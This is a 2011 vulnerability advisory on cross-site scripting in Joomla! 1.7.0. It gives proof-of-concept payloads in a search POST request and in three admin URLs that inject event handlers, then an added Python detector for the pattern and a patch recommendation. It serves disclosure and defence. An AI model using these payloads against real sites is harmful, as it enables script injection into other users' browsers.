Joomla! 1.7.0 Multiple Cross-Site Scripting Vulnerabilities
Published: 2011-09-29
Updated: 2011-10-10
Affected systems:
Joomla! Joomla! 1.7.0
Description:
--------------------------------------------------------------------------------
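Joomla! is an open-source content management system (CMS).
A security flaw exists in the implementation of Joomla!'s core components. A malicious attacker can exploit it through a specially crafted URL to execute arbitrary script code in the user's browser.
Several parameters in the Joomla! Core components (searchword, extension, asset, author) are submitted to /index.php without being properly filtered, which results in XSS attacks.
<*Source: Aung Khant
Link: http://seclists.org/bugtraq/2011/Sep/192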
*>
Testing method:
--------------------------------------------------------------------------------
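Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!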
component: com_search, parameter: searchword (Browser: IE, Konqueror)
=====================================================================
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456
task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
User Login is required to execute the following XSSes.
Parameter: extension, Component: com_categories
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
Parameter: asset , Component: com_media
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=
Parameter: author, Component: com_media
====================================================
http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
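Every request above depends on a quote character in one of the four listed parameters being followed by an inline event handler. The following added example (not part of the original advisory or of Joomla!) flags that pattern in a request URL or urlencoded POST body; the function names, the regular expression and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# The four parameters named in the advisory.
WATCHED = {"searchword", "extension", "asset", "author"}

# Heuristic (an assumption of this example): a quote that can close an HTML
# attribute or a JavaScript string, followed by an inline event handler
# assignment such as onmouseover= or onunload=.
BREAKOUT = re.compile(r"""["'].*?\bon[a-z]+\s*=""", re.I | re.S)


def suspicious_params(encoded):
    """Names of watched parameters in a query string or form body that match."""
    hits = set()
    # Split on "&" only: the values seen here legitimately contain ";".
    for pair in encoded.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) in WATCHED and BREAKOUT.search(unquote_plus(value)):
            hits.add(unquote_plus(name))
    return sorted(hits)


def scan_request(url, body=""):
    """Check both the URL query string and an urlencoded POST body."""
    return sorted(set(suspicious_params(urlsplit(url).query))
                  | set(suspicious_params(body)))


# Constructed samples, shortened from the request shapes shown above.
SAMPLES = [
    ("/index.php", "task=search&searchword=Search';onunload=function(){};//&option=com_search"),
    ("/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22x%22", ""),
    ("/administrator/index.php?option=com_media&asset=1%22%20onmouseover=%22x%22&author=", ""),
    ("/index.php?option=com_search&searchword=o%27brien", ""),  # benign apostrophe
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(scan_request(url, body) or "clean", url)
```

A match is a triage signal for log review or a request filter on an unpatched 1.7.0 site; it does not replace the vendor upgrade.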
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:
http://www.joomla.org/